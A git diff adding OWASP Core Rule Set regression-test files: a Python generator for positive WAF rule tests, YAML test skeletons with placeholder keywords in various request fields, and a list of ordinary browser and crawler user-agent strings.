\"980170\"" + - test_title: 980170-3 + desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is not logged that did not score + stages: + - stage: + input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + protocol: "http" + uri: "/" + output: + no_log_contains: "id \"980170\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/base_positive_rules.py b/nginx/config/owasp-crs/tests/regression/tests/base_positive_rules.py new file mode 100755 index 00000000..b0dc08db --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/base_positive_rules.py @@ -0,0 +1,104 @@ +#!/usr/bin/env python +#@spartantri 2018 + +import sys +import argparse +import base64 + +parser = argparse.ArgumentParser() + +UserAgent="ModSecurity CRS 3 Tests" +Accept="text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" +AcceptCharset="ISO-8859-1,utf-8;q=0.7,*;q=0.7" +AcceptEncoding="gzip,deflate" +AcceptLanguage="en-us,en;q=0.5" +ContentType="application/x-www-form-urlencoded" +payloads=[] +skeletontest=0 +Meta='''--- + meta: + author: "spartantri" + enabled: true + name: "skeletonid.yaml" + description: "Positive tests for rule skeletonid" + tests: +''' + +parser.add_argument('-a', action='store', dest='Addr', help='Target ip address', + default='127.0.0.1') +parser.add_argument('-p', action='store', dest='Port', help='Target port', + default='80') +parser.add_argument('-v', action='store', dest='Host', help='Target virtual host', + default='localhost') +parser.add_argument('-s', action='store', dest='skeleton', help='Skeleton file', + default='positivetest.yaml.skeleton') +parser.add_argument('-o', action='store', dest='output', help='output file', + default='') +parser.add_argument('-r', action='store', dest='ruleid', help='Rule id', + default='944310') +parser.add_argument('-k', action='store', dest='combined_payload', help='Keyword containing combined pipe separated payloads', + default='') +parser.add_argument('-i', action='append', dest='list_payload', help='Keyword containing individual payload', + default=[]) +parser.add_argument('-c', action='store', dest='prefix', help='Prefix keyword for all payloads', + default='') +parser.add_argument('-e', action='store', dest='sufix', help='Sufix keyword for all payloads', + default='') +parser.add_argument('-b', action='store_true', dest='base64encode', help='Encode payload using Base64', + default=False) +parser.add_argument('-d', action='store_true', dest='demo', help='Print demo rules if no data is provided', + default=False) +parser.add_argument('-t', action='store_true', dest='test', help='Launch FTW and test output', + default=False) +parser.add_argument('-w', action='store', dest='author', help='Test author', + default='spartantri') +start_options = parser.parse_args() + +if len(sys.argv)<2 and not start_options.demo: + parser.print_usage() + exit() + +for p in start_options.combined_payload.split('|'): + if p not in payloads: + # print('Checking %s' % (p)) + if len(p)>0: + payloads.append(''.join([start_options.prefix, p, start_options.sufix])) + +for p in start_options.list_payload: + payloads.append(''.join([start_options.prefix, p, start_options.sufix])) + +if start_options.output=='': + o=sys.stdout +else: + o=open(start_options.output, 'w') + +o.write(Meta.replace('skeletonid', start_options.ruleid).replace('spartantri', start_options.author)) +for item in payloads: + if start_options.base64encode: + payload=base64.encodestring(item).replace('\n', '') + #print payload + else: + payload=item + with open(start_options.skeleton,'r') as f: + for l in f: + l=l.replace('skeletonid', start_options.ruleid) + l=l.replace('skeletonkeyword', payload) + l=l.replace('skeletondefaultaddr', start_options.Addr) + l=l.replace('skeletondefaultport', start_options.Port) + l=l.replace('skeletondefaulthost', start_options.Host) + l=l.replace('skeletondefaultuseragent', UserAgent) + l=l.replace('skeletondefaultacceptcharset', AcceptCharset) + l=l.replace('skeletondefaultacceptencoding', AcceptEncoding) + l=l.replace('skeletondefaultacceptlanguage', AcceptLanguage) + l=l.replace('skeletondefaultcontenttype', ContentType) + l=l.replace('skeletondefaultaccept', Accept) + if 'skeletontest' in l: + l=l.replace('skeletontest', str(skeletontest)) + skeletontest+=1 + o.write(l) + +if start_options.output != '': + print ('Generated %s rules to file %s' % (str(skeletontest), start_options.output)) + o.close() + +#print('\nGenerated %s tests' % (str(skeletontest))) diff --git a/nginx/config/owasp-crs/tests/regression/tests/positivetest-light.yaml.skeleton b/nginx/config/owasp-crs/tests/regression/tests/positivetest-light.yaml.skeleton new file mode 100644 index 00000000..65ca4956 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/positivetest-light.yaml.skeleton @@ -0,0 +1,255 @@ + - + test_title: skeletonid-skeletontest + desc: "Argument test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Argument name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword=test" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Cookie test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: test=skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Cookie name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: skeletonkeyword=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Request header test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + test: skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "XML attribute value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "XML element value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Nested XML element value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type text/plain includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type application/json arg value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"skeletonkeyword\"}" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type application/json arg name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"skeletonkeyword\": \"test\"}" + output: + log_contains: "id \"skeletonid\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/positivetest.yaml.skeleton b/nginx/config/owasp-crs/tests/regression/tests/positivetest.yaml.skeleton new file mode 100644 index 00000000..83f0b2de --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/positivetest.yaml.skeleton @@ -0,0 +1,393 @@ + - + test_title: skeletonid-skeletontest + desc: "Argument test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Argument name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword=test" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Cookie test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: test=skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Cookie name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: skeletonkeyword=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Request header test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + test: skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "XML element includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "XML attribute name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "XML attribute value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "XML element value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Nested XML element value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type text/plain includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type application/json arg value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"skeletonkeyword\"}" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type application/json arg name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"skeletonkeyword\": \"test\"}" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type multipart/form-data json arg name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type multipart/form-data json arg value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\nskeletonkeyword\n-----------------------------thisissparta--" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\nskeletonkeyword\n-----------------------------thisissparta--" + output: + log_contains: "id \"skeletonid\"" diff --git a/nginx/config/owasp-crs/tests/regression/utils/data/popularUAs.data b/nginx/config/owasp-crs/tests/regression/utils/data/popularUAs.data new file mode 100644 index 00000000..bb6f417c --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/utils/data/popularUAs.data @@ -0,0 +1,588 @@ +AdsBot-Google ( http://www.google.com/adsbot.html) +Avant Browser/1.2.789rel1 (http://www.avantbrowser.com) +Baiduspider ( http://www.baidu.com/search/spider.htm) +BlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103 +BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/5.0.3.3 UP.Link/5.1.2.12 (Google WAP Proxy/1.0) +BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0 +BlackBerry8320/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/100 +BlackBerry8330/4.3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/105 +BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 +BlackBerry9530/4.7.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 UP.Link/6.3.1.20.0 +BlackBerry9700/5.0.0.351 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/123 +Bloglines/3.1 (http://www.bloglines.com) +CSSCheck/1.2.2 +DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) +DoCoMo/2.0 SH901iC(c100;TB;W24H12) +Download Demon/3.5.0.11 +ELinks (0.4.3; NetBSD 3.0.2PATCH sparc64; 141x19) +ELinks (0.4pre5; Linux 2.6.10-ac7 i686; 80x33) +ELinks/0.12~pre5-4 +ELinks/0.9.3 (textmode; Linux 2.6.9-kanotix-8 i686; 127x41) +EmailWolf 1.00 +FAST-WebCrawler/3.8 (crawler at trd dot overture dot com; http://www.alltheweb.com/help/webmaster/crawler) +FeedFetcher-Google; ( http://www.google.com/feedfetcher.html) +Gaisbot/3.0 (robot@gais.cs.ccu.edu.tw; http://gais.cs.ccu.edu.tw/robot.php) +Googlebot-Image/1.0 +Googlebot-News +Googlebot-Video/1.0 +Googlebot/2.1 ( http://www.googlebot.com/bot.html) +Gregarius/0.5.2 ( http://devlog.gregarius.net/docs/ua) +Gulper Web Bot 0.2.4 (www.ecsl.cs.sunysb.edu/~maxim/cgi-bin/Link/GulperBot) +HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0 +HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +HTMLParser/1.6 +Java/1.6.0_13 +Jigsaw/2.2.5 W3C_CSS_Validator_JFouffa/2.0 +Konqueror/3.0-rc4; (Konqueror/3.0-rc4; i686 Linux;;datecode) +LG-GC900/V10a Obigo/WAP2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1 +LG-LX550 AU-MIC-LX550/2.0 MMP/2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 +Links (2.1pre15; FreeBSD 5.3-RELEASE i386; 196x84) +Links (2.1pre15; Linux 2.4.26 i686; 158x61) +Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48) +Links/0.9.1 (Linux 2.4.24; i386;) +Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12 +Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d +MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 +MOT-V177/0.1.75 UP.Browser/6.2.3.9.c.12 (GUI) MMP/2.0 UP.Link/6.3.1.13.0 +MOT-V9mm/00.62 UP.Browser/6.2.3.4.c.1.123 (GUI) MMP/2.0 +MOTORIZR-Z8/46.00.00 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 356) Opera 8.65 [it] UP.Link/6.3.0.0.0 +MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23 +Mediapartners-Google +Microsoft URL Control - 6.00.8862 +Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2) +Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2.1 +Mozilla/2.0 (compatible; Ask Jeeves/Teoma) +Mozilla/2.02E (Win95; U) +Mozilla/3.0 (compatible; NetPositive/2.1.1; BeOS) +Mozilla/3.01Gold (Win95; I) +Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0 +Mozilla/4.0 (PSP (PlayStation Portable); 2.00) +Mozilla/4.0 (compatible; Dillo 3.0) +Mozilla/4.0 (compatible; GoogleToolbar 4.0.1019.5266-big; Windows XP 5.1; MSIE 6.0.2900.2180) +Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.0 (screen 600x800) +Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; MDA Pro/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1) +Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9500/4.51 Profile/MIDP-2.0 Configuration/CLDC-1.1) +Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC) +Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90) +Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0 ) +Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/hspr-H102; Blazer/4.0) 16;320x320 +Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/hspr-H102; Blazer/4.0) 16;320x320 +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Sprint:PPC6800 +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Sprint:PPC6800 +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) XV6800 +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 8.12; MSIEMobile6.0) +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) +Mozilla/4.0 (compatible; MSIE 6.0; j2me) ReqwirelessWeb/3.5 +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser; Avant Browser; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Maxthon 2.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C) +Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) 